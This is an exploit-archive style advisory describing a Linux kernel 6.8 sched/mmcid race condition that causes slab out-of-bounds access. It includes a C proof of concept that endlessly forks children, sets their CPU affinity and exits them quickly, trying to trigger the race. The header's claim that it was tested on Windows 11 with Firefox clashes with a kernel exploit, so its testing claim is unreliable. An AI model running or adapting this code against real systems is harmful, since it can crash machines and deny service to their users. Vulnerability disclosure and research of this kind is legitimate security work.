=============================================================================================================================================
| # Title     : Linux Kernel 6.8 sched/mmcid Race Condition Leading to Slab Out-of-Bounds Access                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : System built‑in component                                                                                                   |
=============================================================================================================================================

[+] Summary    : A race condition in the sched/mmcid subsystem of the Linux kernel could lead to an out-of-bounds bitmap access during a mode transition between per-CPU and per-task CID management.
                 The issue occurs when a task exits while still marked with the MM_CID_TRANSIT flag (bit 29). In affected kernels, sched_mm_cid_exit() incorrectly assumes that the CID 
                 is owned by the CPU and invokes mm_drop_cid_on_cpu() without validating actual ownership. This may result in an invalid clear_bit() operation using the TRANSIT bit value as a CID index, causing slab out-of-bounds access.
                 Although initially reported as a use-after-free by KASAN, the root cause is an out-of-bounds bitmap write triggered by improper state validation during CID cleanup.

[+] The vulnerability can potentially lead to :

Kernel memory corruption

System instability or crash

Local denial-of-service

Possible local privilege escalation under highly constrained race conditions

The issue has been resolved by adding explicit validation in mm_drop_cid_on_cpu() to ensure that the CID is actually CPU-owned before clearing bitmap bits.

[+] Affected Versions :

Linux kernel versions starting from 6.8 (when per-CPU MM CID management was introduced) up to the release containing the upstream fix.
				 
[+] POC   :  

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <signal.h>

#define MM_CID_TRANSIT (1U << 29)

void setup_affinity(int cpu) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

void trigger_transit_leak() {

    for (int i = 0; i < 100; i++) {
        pid_t pid = fork();
        
        if (pid < 0) exit(1);
        
        if (pid == 0) {

            setup_affinity(i % sysconf(_SC_NPROCESSORS_ONLN));

            usleep(5); 
            exit(0);
        }
    }
}

int main() {
    printf("[*] Starting simulation of mmcid (Out-of-Bounds) vulnerability exploitation...\n");
    printf("[*] Note: Success depends on triggering a Race Condition within the kernel.\n");

    while (1) {
        trigger_transit_leak();

        while (waitpid(-1, NULL, WNOHANG) > 0);

    }

    return 0;
}

	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================